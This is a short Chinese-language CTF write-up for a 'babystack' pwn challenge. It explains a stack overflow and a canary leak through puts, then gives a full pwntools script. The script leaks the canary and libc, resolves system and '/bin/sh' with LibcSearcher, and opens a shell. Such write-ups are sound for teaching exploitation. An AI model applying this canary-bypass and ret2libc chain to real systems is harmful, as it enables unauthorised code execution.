Full RELRO 為got表只讀
程序的功能如下
1是read函數,存在棧溢出,2是puts函數,可以泄露canary,3是退出
思路 :程序中插入了canary,用puts函數泄露,然后再用puts函數來泄露puts_got,用libcsearcher獲得libc版本,最終getshell
canary最后一個字節是 \x00 ,即可以覆蓋canary的低字節,打印出其余canary,但是puts函數遇到 \x00 就停止,所以這里用 \n 來覆蓋 \x00
# -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * context.log_level='debug' #r=remote('node3.buuoj.cn',28246) r=process('./babystack') pop_rdi=0x0000000000400a93 elf=ELF('./babystack') puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] main_addr=0x400908 #泄露canary r.sendlineafter('>>','1') r.sendline('a'*(0x90-0x8)) r.sendlineafter('>>','2') r.recvuntil('a\n') canary=u64(r.recv(7).rjust(8,'\x00')) print('[+]canary: ',hex(canary)) payload='a'*(0x90-0x8)+p64(canary)+'b'*0x8 payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) r.sendlineafter('>>','1') r.sendline(payload) r.sendlineafter('>>','3') r.recv() puts_addr=u64(r.recv(6).ljust(8,'\x00')) libc=LibcSearcher('puts',puts_addr) libc_base=puts_addr-libc.dump('puts') system_addr=libc_base+libc.dump('system') bin_addr=libc_base+libc.dump('str_bin_sh') payload='a'*(0x90-0x8)+p64(canary)+'b'*0x8 payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr) r.sendlineafter('>>','1') r.sendline(payload) r.sendlineafter('>>','3') r.interactive()